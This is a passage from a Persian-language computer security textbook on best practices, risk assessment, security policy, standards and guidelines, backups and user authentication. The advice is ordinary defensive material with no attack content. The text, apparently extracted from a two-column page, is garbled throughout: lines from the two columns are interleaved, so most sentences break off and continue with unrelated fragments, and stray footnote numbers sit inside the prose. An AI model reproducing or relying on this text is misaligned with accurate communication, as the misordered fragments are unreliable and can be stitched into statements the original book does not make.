ﺗﻤﺎﻣﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻨﺎﺳﺐ ﻭ ﺑﻪﺻﺮﻓﻪ ﻧﻴﺴﺘﻨﺪ.
ﺳﺆﺍﻻﺕ ﺭﺍ ﻣﻲﺩﺍﻧﻨﺪ؛ ﺍﻣﺎ ﻣﺤﻘﻘﺎﻥ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﺍﻓـﺮﺍﺩ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﺔ ﺷﺨﺼﻲ ﻗﺎﺩﺭ ﺑﻪ ﺗﺨﻤﻴﻦ ﺻﺤﻴﺢ ﻣﺨـﺎﻃﺮﺍﺕ ﻭ
ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﺯ ﺣﺪﺍﻗﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ.
ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ؛ ﻭ ﺩﺭ ﻋﻤـﻞ ،ﺍﻟﮕﻮﻫـﺎﻱ
ﺑﻪ ﻋﻠﺖ ﻣﺸﻜﻼﺕ ﺫﺍﺗﻲ ﺭﻭﺵ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ،ﺩﺭ ﺳـﺎﻟﻬﺎﻱ
ﺳﺮﺁﻣﺪﻱ ﻭ ﻳﺎ ﺑﻌﺒﺎﺭﺗﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺑﻬﻴﻨﻪ ﻫﻢ ﺧﻮﺩ ﻭﺍﻗﻌـﹰﺎ ﺑﻬﻴﻨـﻪ
ﺍﺧﻴﺮ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ
ﻧﻴﺴﺘﻨﺪ!
ﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ٧٦ﻳـﺎ ﻣﺮﺍﻗﺒـﺖ ﺩﻗﻴـﻖ ٧٧ﻧـﺎﻡ ﺩﺍﺭﺩ .ﺍﻳـﻦ
ﺗﻮﺻﻴﺔ ﻣﺎ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺩﻭ ﺭﻭﻳﻜﺮﺩ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ ﺭﻭﻳﻜﺮﺩ ﺷﺎﻣﻞ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ،ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ
ﺳﺮﺁﻣﺪﻱ ﺍﺳﺖ .ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺪﻧـﺔ ﻳـﻚ ﻣﺠﻤﻮﻋـﻪ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻣﻌﻤﻮﻝ ﺩﺭ ﺟﻮﺍﻣﻊ ﻣﺤﻘﻘﺎﻥ ﺍﻣﻨﻴﺘﻲ ﺗﺎﺋﻴﺪﺷﺪﻩ ﻛـﻪ
ﺳﺮﺁﻣﺪﻱ ،ﻳﻚ ﻃﺮﺍﺡ ﺁﮔﺎﻩ ﺑﺎﻳـﺪ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨـﺪ ،ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﻪ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﻣﻲﺭﺳـﺎﻧﺪ ﻭ
ﺑﺮﺍﻱ ﻫﺮ ﺣﺎﻟﺖ ﺧﺎﺹ ﺳﻴﺴﺘﻢ ﻳﻚ ﺭﺍﻩﺣﻞ ﻣﻌﻘﻮﻝ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳـﺪ. ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﻣﻌﻘـﻮﻟﻲ ﻛـﺎﻫﺶ ﻣـﻲﺩﻫـﺪ .ﻣـﻲﺗﻮﺍﻧﻴـﺪ
ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺎﻳﺪ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺠﺰﺍ ﻗﺮﺍﺭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺭﺍ "ﺑـﺪﻳﻬﻴﺎﺕ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻣﻨﻄﻘـﻲ ﺗـﺪﺍﺑﻴﺮ
ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﻃﺮﻳــﻖ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻳﻲ ﺍﻣﻨﻴﺘﻲ" ﺑﺪﺍﻧﻴﺪ.
ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺣﺪﺍﻗﻞ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﻓﻌـﺎﻝ
ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﻫـﻢ ﻣــﺸﻜﻼﺕ ﺧــﻮﺩ ﺭﺍ ﺩﺍﺭﺩ.
ﺍﺳﺖ .ﻣﺘﺼﺪﻳﺎﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻐﻴﻴـﺮﺍﺕ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ،ﺑـﺎ
ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺸﻜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻴﭻ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ
ﻭﺻﻠﻪﻫﺎ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻧﺪ ،ﻭ ﻣﻨﺘﻈﺮ ﺣﻮﺍﺩﺙ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ
ﺳﺮﺁﻣﺪﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻣﺤﻴﻄﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﺎﺳﺐ
ﺑﺎﺷـﻨﺪ .ﺍﻧﺠــﺎﻡ ﺻـﺤﻴﺢ ﺍﻳــﻦ ﻣـﻮﺍﺭﺩ ﻧﻴــﺎﺯ ﺑـﻪ ﺩﺭﻙ ﻋﻤﻴﻘـﻲ ﺍﺯ
ﺑﺎﺷﺪ .ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﺮﺍﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ
ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻭ ﺩﻻﻳﻞ ﻋﻤﻠﻜﺮﺩ ﻧﺎﺻـﺤﻴﺢ ﺁﻥ ﺩﺍﺭﺩ.
ﻣﺎﻟﻲ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺒﺎﻫﺘﻬﺎﻳﻲ ﺑﻪ ﺍﻟﮕﻮﻫـﺎﻱ
ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺑﻌﺪﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﺩﻧﺒـﺎﻝ
ﺳﺮﺁﻣﺪﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﻚ ﺧﺒﺮﻧﺎﻣﺔ ﺍﺟﺘﻤﺎﻋﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑﻪ
ﻣﻲﺷﻮﺩ.
ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ ،ﻧﻴﺎﺯ ﺑﻪ ﺍﻗـﺪﺍﻣﺎﺕ
ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ.
ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺗـﻀﻤﻴﻦ ﻛﻨـﺪ ﻛـﻪ
ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺭﻭﺑـﺮﻭ ﻧﺨﻮﺍﻫـﺪ ﺷـﺪ .ﺩﺭ ﻏﺎﻟـﺐ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﺮﺍﻱ
ﺍﺧﺒــﺎﺭ ﺣﻤــﻼﺕ ﺟﺪﻳــﺪ ﻭ downloadﻛــﺮﺩﻥ ﻭﺻــﻠﻪﻫــﺎﻱ
ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺤـﺼﻮﻻﺕ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺑﺮﺭﺳـﻲ
ﻧﻤﺎﻳﺪ .ﺍﻣﺎ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ ﻧﻴـﺰ ﭘﻴـﺮﻭﻱ ﻛﻨﻴـﺪ،
ﻣﻬﺎﺟﻤﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺴﺨﻴﺮ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﺷﻤﺎ ﺍﺯ ﺷﻴﻮﻫﺎﻱ ﻧﺎﺩﺍﻧﺴﺘﺔ ﺗﺎﺯﻩ ﻭ ﻣﻨﺘﺸﺮﻧﺸﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺣﺎﻝ
ﺍﻣﻦ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻣﺮﺍﻗﺒـﺖ ﺑـﻪ ﻋﻤـﻞ ﺧﺎﺹ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ؛ ﻣﺜﻞ ﺳﻴﺎﺳﺖ ﭘـﺴﺖﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﺳﻴﺎﺳـﺖ
ﻣﻲﺁﻳﺪ .ﺣﺪﺍﻗﻞ ﻳﻚ ﻫﻔﺘـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺍﺩﻩ ﻫﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ.
ﻛﺎﻣــﻞ ﺍﺯ ﻛــﻞ ﺳﻴــﺴﺘﻢ ﺗﻬﻴــﻪ ﺷــﻮﺩ .ﻫﻤــﺔ ﺭﺳــﺎﻧﻪﻫــﺎﻱ ﺳﻮﻣﻴﻦ ﺭﻭﻳﻜﺮﺩﻱ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﺁﻥ ﺑﻬﺮﻩ ﺟﺴﺘﻪﺍﻧـﺪ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑﺎﻳـﺪ ﺩﺭ ﻧـﻮﻉ ﺧـﻮﺩ ﻭﺍﺟـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻭ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺮﻛﺘﻬﺎ ﺑﺎ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﺑﻞ ﺍﺟـﺮﺍ ﺍﺳـﺖ
ﭘﺬﻳﺮﻓﺘﻪﺷﺪﺓ ﺻﻨﻌﺘﻲ ﺑﺎﺷﻨﺪ ﺗـﺎ ﺣـﺪﺍﻗﻞ ﺑﻌـﺪ ﺍﺯ ﭘـﻨﺞ ﺳـﺎﻝ ﺩﺍﺷﺘﻦ ﺳﻴﺎﺳﺘﻬﺎ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺳﺎﺩﻩ ﻭ ﻣﺨﺘـﺼﺮ
ﺑﺎﻗﻲﻣﺎﻧﺪﻥ ﺩﺭ ﻳﻚ ﺍﻧﺒﺎ ﹺﺭ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺐ ،ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﻪﺍﻧﺪ .ﺩﺭ ﺍﺩﺍﻣﻪ ،ﺭﻭﻳﻜﺮﺩ
ﺑﺎﺯ ﻫﻢ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺑﺎﺷﺪ. ﺁﺧﺮ ﺭﺍ ﺑﻄﻮﺭ ﺧﻼﺻﻪ ﺗﺸﺮﻳﺢ ﺧﻮﺍﻫﻴﻢ ﻛـﺮﺩ ﻭ ﻣﻨـﺎﺑﻊ ﺑﻴـﺸﺘﺮ ﺩﺭ
ﺍﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻧـﺎﻡ ﻫـﻴﭻ ﻣﻜـﺎﻧﻴﺰﻡ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻳـﺎ ﺑـﺴﺘﺔ ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﻧﻴﺰ ﺩﺭ ﺑﺨﺶ ﻣﺮﺍﺟﻊ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ.
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺧﺎﺹ ﺭﺍ ﺫﻛﺮ ﻧﻤﻲﻛﻨﺪ؛ ﻫﺮﭼﻨﺪ ﺁﻥ ﭼﻴﺰﻱ ﻛـﻪ ﺑﺎﻳـﺪ ﺳﻴﺎﺳﺖ ﺳﻪ ﻧﻘﺶ ﻋﻤﺪﻩ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ .ﺍﻭﻝ ﻣﺸﺨﺺ ﻣﻲﻛﻨـﺪ ﺍﺯ
ﺫﺧﻴﺮﻩ ﺷﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﭼﻪ ﻣﺪﺕ ﺑﺎﻳﺪ ﺫﺧﻴـﺮﻩ ﮔـﺮﺩﺩ ﻭ ﭼﻨـﺪ ﭼﻪ ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﻣﻲﺷﻮﺩ ﻭ ﭼﺮﺍ؛ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻣﺮﺑﻮﻁ
ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﺭﺍ ﺑﻮﺿﻮﺡ ﻋﻨﻮﺍﻥ ﻣﻲﻧﻤﺎﻳﺪ. ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻳﻦ ﺣﻔﺎﻇﺖ ﺭﺍ ﻣـﺸﺨﺺ ﻣـﻲﻧﻤﺎﻳـﺪ؛ ﻭ ﺳـﻮﻡ ﺍﻳﻨﻜـﻪ
ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻌﻘﻮﻝ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ: ﺯﻣﻴﻨﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻔﺴﻴﺮ ﻭ ﺣﻞ ﺩﺭﮔﻴﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ
ﺁﻳﻨﺪﻩ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ .ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳﻴﺎﺳـﺖ ﻧﺒﺎﻳـﺪ
ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﻫﺮ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻚ ﺑﻴﺎﻳﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻓﻬﺮﺳﺖ ﺗﻬﺪﻳﺪﻫﺎ ،ﻣﺎﺷﻴﻦﺁﻻﺕ ﻭ ﺍﻓﺮﺍﺩ )ﺑـﺎ
ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺁﻥ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ ﻧﺎﻣﻬﺎﻳﺸﺎﻥ( .ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﻛﻠﻲ ﺑﺎﺷـﺪ ﻭ ﺩﺭ ﻃـﻮﻝ ﺯﻣـﺎﻥ ﺑﻨـﺪﺭﺕ
ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧـﺸﺎﻧﺔ ﺗﺄﻳﻴﺪﻛﻨﻨـﺪﻩ ﺑـﺮﺍﻱ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﻮﺩ.
ﺳﻴﺴﺘﻢ ﺍﺛﺒﺎﺕ ﻧﻤﺎﻳﺪ .ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﻲ ﺗـﻮﺍﻥ
ﺑﻮﺳــﻴﻠﺔ ﻳــﻚ ﻧــﺸﺎﻥ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ،٧٨ﻳــﻚ ﻛــﺎﺭﺕ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ
ﻫﻮﺷﻤﻨﺪ ،٧٩ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻜﺒﺎﺭ ﻣـﺼﺮﻑ ،ﻳـﺎ ﻳـﻚ ﻣﻌﻴـﺎﺭ
ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﺮﻓﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﻲ ٨٠ﺗﺄﻳﻴﺪﺷﺪﻩ ﺻﻮﺭﺕ ﺩﺍﺩ .ﺩﺭ ﻫﻴﭻ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺯﻳﺴﺘ ﹺ
ﻻ ﺍﺯ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﺩﺭ ﻋﺒﺎﺭﺗﻬـﺎﻱ ﺁﻥ ﻣﻌﻤـﻮ ﹰ
ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑﻪ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ ،ﻗﺎﺑﻞ ﺣﻤﻞ ﺑـﻪ ﺧـﺎﺭﺝ ﺍﺯ
ﻓﻌﻞ "ﺑﺎﻳﺪ" ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔـﺮﺩﺩ .ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻋﻤﻮﻣـﹰﺎ ﻣـﺴﺘﻘﻞ ﺍﺯ
ﺷﺮﻛﺖ ﺑﻮﺩﻩ ،ﻳﺎ ﺑﻴﺮﻭﻥ ﺍﺯ ﺩﻓﺘـﺮ ﺧـﺼﻮﺻﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻓﻨﻲ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺣـﺪﺍﻗﻞ ﻳـﻚ ﻣﻌﻴـﺎﺭ
ﻗﺮﺍﺭﮔﺮﻓﺘﻪ ،ﻧﺒﺎﻳـﺪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺗﻜﺮﺍﺭﺷـﺪﻧﻲ ﺑﻌﻨـﻮﺍﻥ
ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺭﻋﺎﻳﺖ ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﻧﻪ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﻣﻜﺎﻧﻴﺰﻡ ﺍﺻﻠﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪﻩﺍﻧﺪ ﻭ ﺩﺭ ﻃـﻮﻝ
ﺭﺍﻫﺒﺮﺩﻫﺎ ﺯﻣﺎﻥ ﺑﻪ ﺁﻫﺴﺘﮕﻲ ﺗﻐﻴﻴﺮ ﻣﻲ ﻛﻨﻨـﺪ .ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺩﺭﺑﺮﮔﻴﺮﻧﺪﺓ ﻣﻄﺎﻟﺒﻲ ﺑﺎﺷﻨﺪ ﻣﺎﻧﻨﺪ ﺍﻳﻨﻜﻪ ﺍﺳﺘﺨﺪﺍﻣﻬﺎﻱ ﺟﺪﻳﺪ ﺑﺎﻳـﺪ
ﻻ ﺩﺭ ﺁﻧﻬـﺎ ﻓﻌـﻞﺭﺍﻫﺒﺮﺩﻫﺎ )ﺧﻂﻣﺸﻲﻫﺎ( ﺍﺳﻨﺎﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ ﭼﮕﻮﻧﻪ ﺍﻧﺠﺎﻡ ﺷـﻮﻧﺪ ،ﺍﺯ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﺎﻳـﺪ ﺗـﺎ ﭼـﻪ ﻣـﺪﺗﻲ
"ﺑﻬﺘﺮ ﺍﺳﺖ" ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﻫﺪﻑ ﺭﺍﻫﺒﺮﺩﻫـﺎ ﺗﻔـﺴﻴﺮ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﮕﻬﺪﺍﺭﻱ ﺑﻌﻤﻞ ﺁﻳﺪ ،ﻭ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ UPSﭼﮕﻮﻧﻪ ﻣـﻮﺭﺩ
ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺧﺎﺹ -ﻳﻚ ﻣﺤﻴﻂ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻳﻚ ﻣﺤﻴﻂ ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﻓﻴﺰﻳﻜﻲ -ﻣﻲﺑﺎﺷﺪ .ﺑﺮﺧﻼﻑ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﺭﺍﻫﺒﺮﺩﻫﺎ ﺩﺭﺻـﻮﺭﺕ
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﺍ
ﻧﻴﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﺍﺟﺰﺍﻱ ﺳﻴﺎﺳﺖ ،ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻣﺸﺎﻥ
ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﺍﻳﻨﮕﻮﻧﻪ ﺁﻣﺪﻩ ﺑﺎﺷﺪ:
ﻻ ﻣﺜﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﺎﺭﺍﻳﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﭘﻴﺪﺍﺳﺖ ،ﻣﻌﻤﻮ ﹰ
ﻧﻤﻲﮔﻴﺮﻧﺪ ،ﺑﻠﻜﻪ ﺑﺼﻮﺭﺕ ﺭﺍﻫﻬﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﻛﻤـﻚ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺑﺮ
ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ. ﺍﺳﺎﺱ ﻳﻚ ﺑﺮﻧﺎﻣـﺔ ﻣـﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺗﻬﻴـﻪ ﺷـﻮﻧﺪ .ﺩﺭ ﻫـﻴﭻ
